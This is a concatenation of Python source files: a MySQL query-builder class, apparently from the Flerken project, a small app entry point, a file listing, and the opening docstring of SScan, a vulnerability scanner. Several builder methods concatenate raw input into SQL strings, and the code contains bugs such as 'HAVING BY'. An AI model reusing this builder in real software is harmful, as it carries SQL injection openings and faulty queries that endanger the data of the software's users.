elif param_number > 1:
if isinstance(where[1], tuple):
whereSubString = where[0] % where[1]
elif isinstance(where[1], list):
whereSubString = where[0] % tuple(where[1])
else:
param_array = []
for i in range(1, param_number):
param_array.append(where[i])
whereSubString = where[0] % tuple(param_array)
whereSubString = '( ' + whereSubString + ' )'
elif isinstance(where[0], dict):
whereSubString = self._parseWhereArrayParam(where[0])
else:
self.throw_exception("where condition only accepts dict or string")
self.whereStringArray.append(whereSubString)
return self
def parseWhere(self):
length = len(self.whereStringArray)
if length == 0:
return
if length > 1:
self.whereString = ' WHERE ( ' + self.whereStringArray[0] + ' )'
for i in range(1, length):
self.whereString += ' AND ( ' + self.whereStringArray[i] + ' )'
else:
self.whereString = ' WHERE ' + self.whereStringArray[0]
# table('table_name') | table('table_name AS t') | table('database.table_name AS t1')
# table({'table_name':'', 'table_name':'t', 'database.table_name':'t1'})
def table(self, table):
if isinstance(table, str):
self.tmp_table = table
elif isinstance(table, dict):
if len(table) == 0:
self.throw_exception('no table selected')
self.tmp_table = ''
for key, val in table.items():
if val != '':
strpos = key.find('.')
if strpos == -1:
self.tmp_table += '`' + key.strip() + '` AS `' + val.strip() + '`,'
else:
self.tmp_table += key.strip() + ' AS `' + val.strip() + '`,'
else:
strpos = key.find('.')
if strpos == -1:
self.tmp_table += '`' + key.strip() + '`,'
else:
self.tmp_table += key.strip() + ','
self.tmp_table = self.tmp_table.rstrip(',')
else:
self.throw_exception('table condition input error:"' + table + '"')
return self
def alias(self, alias):
self.aliasString = ' AS `' + alias + '`'
return self
# field() | field('') | field('*') | field(True) | field('id,username as name, db.pass')
# field({'id':'', 'username':'name', 'db.pass':''})
# field('sex,head', True) | field(('sex', 'head'), True)
def field(self, field='', filter=False):
if field == True:
self.set_columns(self.table_name if not self.tmp_table else self.tmp_table)
self.fieldString += ' '
columns_array = self.columns
columns_array.pop(0)
for column in columns_array:
self.fieldString += '`' + column + '`,'
self.fieldString = self.fieldString.rstrip(',')
return self
if filter:
if not isinstance(field, (str, set, list, tuple)):
self.throw_exception("filter only accepts set、list、tuple")
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
columns_list = self.columns
columns_list.pop(0)
columns_dict = {}
for index, item in enumerate(columns_list):
columns_dict[str(index)] = item
explode_array = []
if isinstance(field, str):
explode_array = re.split('\s{0,},\s{0,}', field.strip())
else:
for single_field in field:
explode_array.append(single_field.strip())
for index, item in list(columns_dict.items()):
if item in explode_array:
columns_dict.pop(index)
for index, item in columns_dict.items():
self.fieldString += '`' + item + '`,'
self.fieldString = ' ' + self.fieldString.rstrip(',')
return self
if field == '' or field == '*':
self.fieldString = ' *'
return self
if isinstance(field, str):
field_array = field.split(',')
field_array = list(map(self._addSpecialChar, field_array))
self.fieldString = ','.join([item for item in field_array])
elif isinstance(field, dict):
for key, val in field.items():
if val == '':
after_process_key = self._addSpecialChar(key)
self.fieldString += after_process_key + ','
else:
after_process_key = self._addSpecialChar(key)
after_process_val = self._addSpecialChar(val)
self.fieldString += after_process_key + ' AS ' + after_process_val + ','
self.fieldString = self.fieldString.rstrip(',')
else:
self.throw_exception("field condition only suport dict")
self.fieldString = ' ' + self.fieldString
return self
def order(self, order):
if isinstance(order, str):
self.orderString = ' ORDER BY ' + order
elif isinstance(order, dict):
self.orderString = ' ORDER BY '
for key, val in order.items():
if val == '':
self.orderString += '`' + key.strip() + '`,'
else:
if val.lower() != 'asc' and val.lower() != 'desc':
self.throw_exception("please use asc or desc in order,default is asc,unknow sort method detected")
self.orderString += '`' + key.strip() + '` ' + val + ','
self.orderString = self.orderString.rstrip(',')
else:
self.throw_exception("order condition only accepts dict or string")
return self
def limit(self, *limit):
param_number = len(limit)
if param_number == 1:
if not isinstance(limit[0], (int, str)):
self.throw_exception("illegal limit query")
if isinstance(limit[0], str):
if not re.match('^\d+\s{0,},\s{0,}\d+$', limit[0].strip()) and not re.match('^\d+$', limit[0].strip()):
self.throw_exception("illegal limit query")
self.limitString = ' LIMIT ' + str(limit[0])
elif param_number == 2:
for i in range(2):
if not is_numeric(limit[i]):
self.throw_exception("illegal limit query")
self.limitString = ' LIMIT ' + str(limit[0]) + ',' + str(limit[1])
else:
self.throw_exception("limit condition need 1 argument at least, 2 arguments at most")
return self
def page(self, page_number, amount):
if not is_numeric(page_number) or not is_numeric(amount):
self.throw_exception("page need input page_number and count in every page")
start = (int(page_number) - 1) * int(amount)
self.limitString = ' LIMIT ' + str(start) + ',' + str(amount)
return self
def group(self, group):
if not isinstance(group, str):
self.throw_exception("group only accepts string")
self.groupString = ' GROUP BY ' + group
return self
def having(self, having):
if not isinstance(having, str):
self.throw_exception("having only accepts string")
self.havingString = ' HAVING BY ' + having
return self
def join(self, join):
if isinstance(join, str):
self.joinString += ' INNER JOIN ' + join
elif isinstance(join, (list, tuple)):
if len(join) != 2:
self.throw_exception("join condition need 2 arguments at least")
self.joinString += ' ' + join[1] + ' JOIN ' + join[0]
else:
self.throw_exception("join only accepts str、list、tuple")
return self
def fetchSql(self, fetchSql=True):
self.fetchSql = fetchSql
return self
def count(self, field='*'):
self.fieldString = ' COUNT(' + field + ') AS f_count'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_count']
def max(self, field):
self.fieldString = ' MAX(' + field + ') AS f_max'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_max']
def min(self, field):
self.fieldString = ' MIN(' + field + ') AS f_min'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_min']
def avg(self, field):
self.fieldString = ' AVG(' + field + ') AS f_avg'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_avg']
def sum(self, field):
self.fieldString = ' SUM(' + field + ') AS f_sum'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_sum']
def buildSql(self):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
self.fieldString = ' *' if self.fieldString == '' else self.fieldString
self.parseWhere()
sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
buildSql = self._replaceSpecialChar('%s', self.whereValueArray, sqlString)
self._clearSubString()
return '( ' + buildSql + ' )'
def find(self, primary_key_value=''):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
if primary_key_value != '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
self.whereStringArray.append('`' + self.columns[0] + '` = %s')
self.whereValueArray.append(primary_key_value)
self.limitString = ' LIMIT 1'
self.fieldString = ' *' if self.fieldString == '' else self.fieldString
self.parseWhere()
sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
res = self.query(sqlString, True)
return res
def select(self, query=True):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
self.fieldString = ' *' if self.fieldString == '' else self.fieldString
self.parseWhere()
sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
if query == False:
self.fetchSql = True
res = self.query(sqlString)
return res
def add(self, data=''):
field_str = ''
if data != '':
if not isinstance(data, dict):
self.throw_exception('add only accepts dict')
length = len(data)
if length == 0:
placeholder = ''
else:
for key, val in data.items():
field_str += '`' + key + '`,'
self.whereValueArray.append(val)
field_str = field_str.rstrip(',')
placeholder = '%s'
for i in range(1, length):
placeholder += ',%s'
else:
placeholder = ''
if self.tmp_table != '':
table_name = self.tmp_table
else:
table_name = '`' + self.table_name + '`'
sqlString = 'INSERT INTO ' + table_name + ' (' + field_str + ') VALUES (' + placeholder + ')'
res = self.execute(sqlString)
if isinstance(res, str) or res == False:
return res
self.lastInsertId = self.cur.lastrowid
return self.lastInsertId
def addAll(self, dataList):
if not isinstance(dataList, (list, tuple)):
self.throw_exception('addAll only accepts list、tuple')
field_str = ''
fieldList = []
number = len(dataList)
valueListStr = ''
if number == 0:
self.throw_exception('addAll not accepts empty dict')
if not isinstance(dataList[0], dict):
self.throw_exception('the argument in the addAll method must be a list or tuple consisting of a dictionary')
number_field = len(dataList[0])
if number_field == 0:
valueListStr += '()'
for i in range(1, number):
if not isinstance(dataList[i], dict):
self.throw_exception('the argument in the addAll method must be a list or tuple consisting of a dictionary')
valueListStr += ',()'
else:
valueStr = '('
for key, val in dataList[0].items():
fieldList.append(key)
self.whereValueArray.append(val)
field_str += key + ','
valueStr += '%s,'
field_str = field_str.rstrip(',')
valueStr = valueStr.rstrip(',')
valueStr += ')'
valueListStr += valueStr
for i in range(1, number):
for j in range(number_field):
self.whereValueArray.append(dataList[i][fieldList[j]])
valueListStr += ',' + valueStr
if self.tmp_table != '':
table_name = self.tmp_table
else:
table_name = '`' + self.table_name + '`'
sqlString = 'INSERT INTO ' + table_name + ' (' + field_str + ') VALUES ' + valueListStr
res = self.execute(sqlString)
if isinstance(res, str) or res == False:
return res
self.lastInsertId = self.cur.lastrowid
return self.lastInsertId
def setField(self, *field):
param_number = len(field)
if field == 0:
self.throw_exception('setField condition is empty')
self.parseWhere()
if self.whereString == '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
if isinstance(field[0], dict) and self.columns[0] != '' and self.columns[0] in field[0]:
if isinstance(field[0][self.columns[0]], (list, tuple)):
if field[0][self.columns[0]][0].upper() == 'EXP':
self.whereString = ' WHERE `' + self.columns[0] + '` = ' + field[0][self.columns[0]][1].strip()
else:
self.throw_exception('setField only accepts EXP')
else:
self.whereString = ' WHERE `' + self.columns[0] + '` = %s'
self.whereValueArray.append(field[0][self.columns[0]])
del field[0][self.columns[0]]
elif self.columns[0] == '':
self.throw_exception('there are no update conditions, and the specified data table has no primary key and is not allowed to perform update operations')
else:
self.throw_exception('there are no update conditions, the data object itself does not contain a primary key field, and is not allowed to perform update operations')
setFieldStr = ''
updateValueArray = []
if isinstance(field[0], str):
if param_number != 2:
self.throw_exception('the setField clause receives two parameters (property name, attribute value)')
if field[0].find('.') == -1:
setFieldStr += '`' + field[0].strip() + '` = %s'
else:
setFieldStr += field[0].strip() + ' = %s'
updateValueArray.append(field[1])
elif isinstance(field[0], dict):
if param_number != 1:
self.throw_exception('the setField only accepts dict')
for key, val in field[0].items():
if isinstance(val, (list, tuple)):
if val[0].upper() == 'EXP':
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = ' + val[1].strip() + ','
else:
setFieldStr += key.strip() + ' = ' + val[1].strip() + ','
else:
self.throw_exception('setField only accepts EXP')
else:
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = %s,'
else:
setFieldStr += key.strip() + ' = %s,'
updateValueArray.append(val)
setFieldStr = setFieldStr.rstrip(',')
else:
self.throw_exception('setField argument input error:' + field[0])
self.whereValueArray = updateValueArray + self.whereValueArray
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
sqlString = 'UPDATE ' + table_name + self.joinString + ' SET ' + setFieldStr + self.whereString + self.orderString + self.limitString
res = self.execute(sqlString)
return res
def setInc(self, field, value=1):
data = {}
data[field] = ['EXP', field + ' + ' + str(value)]
return self.save(data)
def setDec(self, field, value=1):
data = {}
data[field] = ['EXP', field + ' - ' + str(value)]
return self.save(data)
def save(self, data):
if not isinstance(data, dict):
self.throw_exception('save only accepts dict')
self.parseWhere()
if self.whereString == '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
if self.columns[0] != '' and self.columns[0] in data:
if isinstance(data[self.columns[0]], (list, tuple)):
if data[self.columns[0]][0].upper() == 'EXP':
self.whereString = ' WHERE `' + self.columns['PRI'] + '` = ' + data[self.columns[0]][1].strip()
else:
self.throw_exception('save only accepts EXP')
else:
self.whereString = ' WHERE `' + self.columns[0] + '` = %s'
self.whereValueArray.append(data[self.columns[0]])
del data[self.columns[0]]
elif self.columns[0] == '':
self.throw_exception('there are no update conditions, and the specified data table has no primary key and is not allowed to perform update operations')
else:
self.throw_exception('there are no update conditions, the data object itself does not contain a primary key field, and is not allowed to perform update operations')
setFieldStr = ''
updateValueArray = []
for key, val in data.items():
if isinstance(val, (list, tuple)):
if val[0].upper == 'EXP':
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = ' + val[1].strip() + ','
else:
setFieldStr += key.strip() + ' = ' + val[1].strip() + ','
else:
self.throw_exception('save only accepts EXP')
else:
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = %s,'
else:
setFieldStr += key.strip() + ' = %s,'
updateValueArray.append(val)
setFieldStr = setFieldStr.rstrip(',')
self.whereValueArray = updateValueArray + self.whereValueArray
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
sqlString = 'UPDATE ' + table_name + self.joinString + ' SET ' + setFieldStr + self.whereString + self.orderString + self.limitString
res = self.execute(sqlString)
return res
def delete(self, table=''):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
if table != '':
table = ' ' + table
self.parseWhere()
if self.whereString == '':
if self.joinString == '' or self.joinString.upper().find(' ON ') == -1:
self.throw_exception('no condition find, this operation not be allowed')
sqlString = 'DELETE' + table + ' FROM ' + table_name + self.joinString + self.whereString + self.orderString + self.limitString
res = self.execute(sqlString)
return res
def deleteById(self, primary_key_value, table=''):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
if table != '':
table = ' ' + table
if primary_key_value != '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
self.whereStringArray.append('`' + self.columns[0] + '` = %s')
self.whereValueArray.append(primary_key_value)
self.parseWhere()
sqlString = 'DELETE' + table + ' FROM ' + table_name + self.joinString + self.whereString
res = self.execute(sqlString)
return res
def query(self, queryStr, is_find=False):
if not isinstance(queryStr, str):
self.throw_exception('query can only deal with string')
if self.fetchSql == True:
buildSql = self._replaceSpecialChar('%s', self.whereValueArray, queryStr)
self._clearSubString()
return buildSql
try:
self.queryStr = self._replaceSpecialChar('%s', self.whereValueArray, queryStr)
tmp_whereValueArray = self.whereValueArray
self._clearSubString()
if len(tmp_whereValueArray) > 0:
self.cur.execute(queryStr, tmp_whereValueArray)
else:
self.cur.execute(queryStr)
if is_find == True:
res = self.cur.fetchone()
else:
res = self.cur.fetchall()
return res
except mysql.connector.Error as err:
return self.haveErrorThrowException(err)
def execute(self, execStr):
if not isinstance(execStr, str):
self.throw_exception('execute can only deal with string')
if self.fetchSql == True:
buildSql = self._replaceSpecialChar('%s', self.whereValueArray, execStr)
self._clearSubString()
return buildSql
try:
self.queryStr = self._replaceSpecialChar('%s', self.whereValueArray, execStr)
tmp_whereValueArray = self.whereValueArray
self._clearSubString()
if len(tmp_whereValueArray) > 0:
self.cur.execute(execStr, tmp_whereValueArray)
else:
self.cur.execute(execStr)
self.numRows = self.cur.rowcount
return self.numRows
except mysql.connector.Error as err:
return self.haveErrorThrowException(err)
# If consistent_snapshot is True, Connector/Python sends WITH CONSISTENT SNAPSHOT with the statement. MySQL ignores this for isolation levels for which that option does not apply.
# isolation_level: permitted values are 'READ UNCOMMITTED', 'READ COMMITTED', 'REPEATABLE READ', and 'SERIALIZABLE'
# The readonly argument can be True to start the transaction in READ ONLY mode or False to start it in READ WRITE mode. If readonly is omitted, the server's default access mode is used.
def startTrans(self, consistent_snapshot=False, isolation_level=None, readonly=False):
for link in pythonMySQL.links.values():
link.start_transaction(consistent_snapshot, isolation_level, readonly)
def inTrans(self):
return self.con.in_transaction
def rollback(self):
for link in pythonMySQL.links.values():
link.rollback()
def commit(self):
for link in pythonMySQL.links.values():
link.commit()
def getLastSql(self):
if not self.dbdebug:
self.throw_exception('please set DEBUG to True')
return self.queryStr
def _sql(self):
return self.cur.statement
def _parseWhereArrayParam(self, whereArrayParam):
logic = ' AND '
whereSubString = ''
if '_complex' in whereArrayParam:
whereSubString = '( ' + self._parseWhereArrayParam(whereArrayParam['_complex']) + ' )'
del whereArrayParam['_complex']
if '_logic' in whereArrayParam:
if whereArrayParam['_logic'].upper() in self.SQL_logic:
logic = ' ' + whereArrayParam['_logic'].upper() + ' '
else:
self.throw_exception('_logic in _query is not supported:"' + whereArrayParam['_logic'] + '"')
del whereArrayParam['_logic']
if '_string' in whereArrayParam:
whereSubString += logic + '( ' + whereArrayParam['_string'] + ' )'
del whereArrayParam['_string']
if '_query' in whereArrayParam:
explode_query = whereArrayParam['_query'].split('&')
explode_array = {}
for key_val in explode_query:
explode_sub_query = key_val.split('=')
explode_array[explode_sub_query[0]] = explode_sub_query[1]
if '_logic' in explode_array:
if explode_array['_logic'].upper() in self.SQL_logic:
sub_logic = ' ' + explode_array['_logic'].upper() + ' '
else:
self.throw_exception('_logic in _query is not supported:"' + explode_array['_logic'] + '"')
del explode_array['_logic']
querySubString = ''
for key, val in explode_array.items():
start = key.find('.')
if start != -1:
querySubString += sub_logic + key + " = '" + val + "'"
else:
querySubString += sub_logic + "`" + key + "` = '" + val + "'"
querySubString = querySubString.lstrip(sub_logic)
whereSubString += logic + '( ' + querySubString + ' )'
del whereArrayParam['_query']
for key, val in whereArrayParam.items():
whereArraySubString = ''
have_and = key.find('&')
have_or = key.find('|')
if isinstance(val, (list, tuple)):
if have_and == -1 and have_or == -1:
whereArraySubString += self._singleKey2Array(key, val)
elif (have_and != -1 and have_or == -1) or (have_and == -1 and have_or != -1):
if have_and != -1:
string_logic = '&'
sub_logic = ' AND '
else:
string_logic = '|'
sub_logic = ' OR '
explode_array = key.split(string_logic)
signal = 1
if len(explode_array) == len(val):
signal = 1
else:
if val[-1] == '' or val[-1] == 's':
signal = 1
elif val[-1] == 'm':
signal = 2
elif val[-1] == 'e':
signal = 3
else:
self.throw_exception('this query method is not supported:"' + val[-1] + '"')
if signal == 1:
index = 0
for explode_val in explode_array:
if isinstance(val[index], (list, tuple)):
whereArraySubString += self._singleKey2Array(explode_val, val[index])
else:
start = explode_val.find('.')
if start != -1:
whereArraySubString += sub_logic + explode_val + " = %s"
else:
whereArraySubString += sub_logic + "`" + explode_val + "` = %s"
self.whereValueArray.append(val[index])
index += 1
elif signal == 2:
for explode_val in explode_array:
get_parseMultiQuery = self._parseMultiQuery(explode_val, val)
whereArraySubString += sub_logic + get_parseMultiQuery
else:
for explode_val in explode_array:
get_parseExpQuery = self._parseExpQuery(explode_val, val)
whereArraySubString += sub_logic + get_parseExpQuery
whereArraySubString = whereArraySubString.lstrip(sub_logic)
whereArraySubString = '( ' + whereArraySubString + ' )'
else:
self.throw_exception('"|" and "&" cannot be used in the same time')
else:
start = key.find('.')
if have_and == -1 and have_or == -1:
if start != -1:
whereArraySubString += key + " = %s"
else:
whereArraySubString += "`" + key + "` = %s"
self.whereValueArray.append(val)
elif (have_and != -1 and have_or == -1) or (have_and == -1 and have_or != -1):
if have_and != -1:
string_logic = '&'
sub_logic = ' AND '
else:
string_logic = '|'
sub_logic = ' OR '
explode_array = key.split(string_logic)
whereArraySubString = ''
for explode_val in explode_array:
start = explode_val.find('.')
if start != -1:
whereArraySubString += sub_logic + explode_val + " = %s"
else:
whereArraySubString += sub_logic + "`" + explode_val + "` = %s"
self.whereValueArray.append(val)
whereArraySubString = whereArraySubString.lstrip(sub_logic)
whereArraySubString = '( ' + whereArraySubString + ' )'
else:
self.throw_exception('"|" and "&" cannot be used in the same time')
whereSubString += logic + whereArraySubString
whereSubString = whereSubString.lstrip(logic)
return whereSubString
def _singleKey2Array(self, key, array):
if array[-1] == '' or array[-1] == 'm':
return self._parseMultiQuery(key, array)
elif array[-1] == 'e':
return self._parseExpQuery(key, array)
else:
self.throw_exception('this query method is not supported"' + array[-1] + '"')
def _parseExpQuery(self, column, array):
expQueryString = ''
start = column.find('.')
specialChar_index = column.find('`')
if specialChar_index == -1 and start == -1:
column = '`' + column + '`'
exp_type = array[0].upper()
if exp_type == "EQ":
expQueryString += column + ' = %s'
self.whereValueArray.append(array[1])
elif exp_type == "NEQ":
expQueryString += column + ' <> %s'
self.whereValueArray.append(array[1])
elif exp_type == "GT":
expQueryString += column + ' > %s';
self.whereValueArray.append(array[1])
elif exp_type == "EGT":
expQueryString += column + ' >= %s';
self.whereValueArray.append(array[1])
elif exp_type == "LT":
expQueryString += column + ' < %s';
self.whereValueArray.append(array[1])
elif exp_type == "ELT":
expQueryString += column + ' <= %s';
self.whereValueArray.append(array[1])
elif exp_type == "LIKE" or exp_type == "NOTLIKE" or exp_type == "NOT LIKE":
if exp_type == "LIKE":
string = ' LIKE '
else:
string = ' NOT LIKE '
if isinstance(array[1], (list, tuple, set)):
logic = ' AND '
if array[2] != '':
if array[2].upper() in self.SQL_logic:
logic = ' ' + array[2].upper() + ' '
else:
self.throw_exception('the logical operators in [NOT] LIKE"' + array[2] + '"is not supported')
for val in array[1]:
expQueryString += logic + column + string + ' %s'
self.whereValueArray.append(str(val))
expQueryString = expQueryString.lstrip(logic)
expQueryString = '( ' + expQueryString + ' )'
elif isinstance(array[1], str):
expQueryString += column + string + ' %s'
self.whereValueArray.append(array[1])
else:
self.throw_exception('the 2rd params of [NOT] LIKE need to be str、list、tuple、set')
elif exp_type == "BETWEEN" or exp_type == "NOTBETWEEN" or exp_type == "NOT BETWEEN":
# example array('between','1,8') | array('between',1,8) | array('between',array('1','8'))
if exp_type == "BETWEEN":
string = ' BETWEEN '
else:
string = ' NOT BETWEEN '
expQueryString += column + string + '%s AND %s'
if isinstance(array[1], (list, tuple)):
self.whereValueArray.append(array[1][0])
self.whereValueArray.append(array[1][1])
elif isinstance(array[1], str):
explode_array = array[1].split(',')
if len(explode_array) != 2:
self.throw_exception('error param after [NOT]BETWEEN:' + array[1])
self.whereValueArray.append(explode_array[0].strip())
self.whereValueArray.append(explode_array[1].strip())
elif is_numeric(array[1]):
if not is_numeric(array[2]):
self.throw_exception('error param after [NOT]BETWEEN(two number expected)');
self.whereValueArray.append(array[1])
self.whereValueArray.append(array[2])
else:
self.throw_exception('error param after [NOT]BETWEEN:' + array[1])
elif exp_type == "IN" or exp_type == "NOTIN" or exp_type == "NOT IN":
# example:array('not in',array('a','b','c')) | array('not in','a,b,c')
if exp_type == "IN":
string = ' IN '
else:
string = ' NOT IN '
if isinstance(array[1], (list, tuple)):
length = len(array[1])
if length == 0:
self.throw_exception('empty array detected in param after [NOT]IN:array()')
expQueryString += column + string + '('
expQueryString += '%s'
self.whereValueArray.append(array[1][0])
for i in range(1, length):
expQueryString += ',%s'
self.whereValueArray.append(array[1][i])
expQueryString += ')'
elif isinstance(array[1], str):
explode_array = array[1].split(',')
length = len(explode_array)
expQueryString += column + string + '('
expQueryString += '%s'
self.whereValueArray.append(explode_array[0])
for i in range(1, length):
expQueryString += ',%s'
self.whereValueArray.append(explode_array[i])
expQueryString += ')'
else:
self.throw_exception('error param after [NOT]IN:' + array[1])
elif exp_type == "EXP":
if isinstance(array[1], str):
expQueryString += column + array[1]
else:
self.throw_exception('error param after exp:' + array[1])
else:
self.throw_exception('error params:"' + array[0] + '"')
return expQueryString
def _parseMultiQuery(self, column, array):
multiQueryString = ''
start = column.find('.')
specialChar_index = column.find('`')
if specialChar_index == -1 and start == -1:
column = '`' + column + '`'
length = len(array) - 2
logic = ' AND '
if array[-2] != '':
if array[-2].upper() in self.SQL_logic:
logic = ' ' + array[-2].upper() + ' '
else:
self.throw_exception('Logical Operators "' + array[-2] + '"is not supported in multiple condition query')
for i in range(length):
if isinstance(array[i], (list, tuple)):
multiQueryString += logic + self._singleKey2Array(column, array[i])
else:
multiQueryString += logic + column + ' = %s'
self.whereValueArray.append(array[i])
multiQueryString = multiQueryString.lstrip(logic)
multiQueryString = '( ' + multiQueryString + ' )'
return multiQueryString
def _addSpecialChar(self, value):
value = value.strip()
if value.find(' as ') != -1:
value = re.sub('\s+', ' ', value)
MatchObject = re.search('(?<=\s{1}as\s{1})\w+$', value, re.I)
if MatchObject == None:
self.throw_exception('"' + value + '"regex error, please try again')
else:
table_alias = MatchObject.group(0)
value = re.sub('(?<=\s{1}as\s{1})\w+$', '`' + table_alias + '`', value, 0, re.I)
table_name = re.search('^.*(?=\s{1}as\s{1}`)', value, re.I).group(0)
if re.match('^\w+$', table_name):
value = re.sub('^\w+(?=\s{1}as\s{1}`)', '`' + table_name + '`', value, 0, re.I)
elif re.match('^\w+\.\w+$', value):
pass
else:
if not re.search('\W+', value):
value = '`' + value + '`'
return value
def _replaceSpecialChar(self, pattern, replacement, subject):
for val in replacement:
if isinstance(val, int):
subject = re.sub(pattern, str(val), subject, 1)
else:
subject = re.sub(pattern, pdo_quote(val), subject, 1)
return subject
def _get_file_lastline(self, file_name, n=1):
try:
with open(file_name, 'rb') as f:
f.seek(-1, 2)
content = ''
while n > 0:
s = f.read(1).decode('ascii')
if s == '\n' and content:
n -= 1
if n == 0:
break
content = ''
content = s + content
f.seek(-2, 1)
return content.strip()
except BaseException as e:
self.throw_exception(e)
def _clearSubString(self):
self.SQLerror = {}
self.fieldString = ''
self.joinString = ''
self.whereString = ''
self.groupString = ''
self.havingString = ''
self.orderString = ''
self.limitString = ''
self.aliasString = ''
self.tmp_table = ''
self.fetchSql = False
self.whereStringArray = []
self.whereValueArray = []
def haveErrorThrowException(self, err):
if self.dbdebug:
self.SQLerror = {
'errno': err.errno,
'sqlstate': err.sqlstate,
'msg': err.msg,
'sql': self.queryStr
}
return False
def showError(self):
if self.dbdebug:
if 'errno' in self.SQLerror:
print('Error Code: ' + str(self.SQLerror['errno']))
print('SQLSTATE: ' + self.SQLerror['sqlstate'])
print('Error Message: ' + self.SQLerror['msg'])
print('Error SQL: ' + self.SQLerror['sql'])
else:
print("no error deteced in the most recent SQL query")
else:
print("set DEBUG to True to show the complete error message")
def getNumRows(self):
return self.numRows
def close(self):
if self.connected:
# self.cur.close()
self.con.close()
def __del__(self):
self.close()
def throw_exception(self, errMsg, ignore_debug=False):
if self.dbdebug or ignore_debug:
print('Error: ' + errMsg + '\n\n' + 'stack: \n')
length = len(traceback.format_stack())
for i in range(length - 1):
print(traceback.format_stack()[i])
else:
errMsg = "unknow error"
print(errMsg)
sys.exit(0)
def isset(variable):
return variable in locals() or variable in globals()
def is_numeric(var):
try:
float(var)
return True
except ValueError:
return False
# PDO::quote
def pdo_quote(string):
return "'" + re.sub(r'(?<=[^\\])([\'\"\%\_\\])', r'\\\1', str(string)) + "'"
#M function
def M(dbtable, ConfigID=0, dbConfig=None):
return pythonMySQL(dbtable, ConfigID, dbConfig)
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
The Entry of Flerken App
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
from flerken import app
from flerken.config.global_config import APP_CONFIG
app.run(host=APP_CONFIG['HOST'],port=APP_CONFIG['PORT'])
|
[
"/coverage/coverage_test.py",
"/flerken/__init__.py",
"/flerken/config/global_config.py",
"/flerken/control/plugins/custom_meta_chars_plugin.py",
"/flerken/control/plugins/linux_generic_detect_plugin.py",
"/flerken/control/plugins/linux_generic_filter_plugin.py",
"/flerken/control/plugins/linux_graphic_detect_plugin.py",
"/flerken/control/plugins/linux_special_detect_plugin.py",
"/flerken/control/plugins/win_generic_detect_plugin.py",
"/flerken/control/plugins/win_special_detect_plugin.py",
"/flerken/control/plugins/win_special_filter_plugin.py",
"/flerken/control/smart_detect.py",
"/flerken/detection.py",
"/flerken/landing.py",
"/flerken/lib/mysql_conn.py",
"/runApp.py"
] |
02bx/SScan
|
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
import fire
import os
from datetime import datetime
from lib.config.log import logger, log_path
import glob
import re
import time
from lib.config.banner import SScan_banner
from lib.common.report import save_report, save_fofa
from lib.common.common import prepare_targets, scan_process
from lib.module.proxy import checkProxyFile
from lib.config.data import fofa_info
from lib.config import setting
from lib.common.utils import clear_queue, check_fofa, ctrl_quit, read_rules
import multiprocessing
import signal
import warnings
warnings.filterwarnings('ignore')
# 进度条设置
from rich.progress import (
BarColumn,
TimeRemainingColumn,
TransferSpeedColumn,
Progress,
)
class SScan(object):
"""
InfoScan help summary page\n
InfoScan is a Sensitive information detection and vulnerability scanning program
Example:
python3 SScan.py version
python3 SScan.py --host example.com run
python3 SScan.py --file domains.txt run
:param str host: HOST1 HOST2 ... Scan several hosts from command line
:param str file: Load new line delimited targets from TargetFile
:param str dire: Load all *.txt files from TargetDirectory
:param int network: Scan all Target/MASK neighbour hosts, should be an int between 8 and 31
:param int t: Num of scan threads for each scan process, 10 by default
:param tuple rule: RuleFileName1,RuleFileName2,... Import specified rules files only.
:param bool crawl: crawling, crawl <a href='...'> (default True)
:param bool checkcdn: Check the CDN and skip the IP where the CDN exists (default True)
:param bool full: Process all sub directories /x/y/z/,/x/ /x/y/ (default True)
:param str script: ScriptName1,ScriptName2,...
:param bool script_only: Scan with user scripts only
:param bool noscripts: Disable all scripts (default False)
:param bool browser: Do not open web browser to view report (default True)
:param bool fofa: Save the results of the FOFA search (default True)
"""
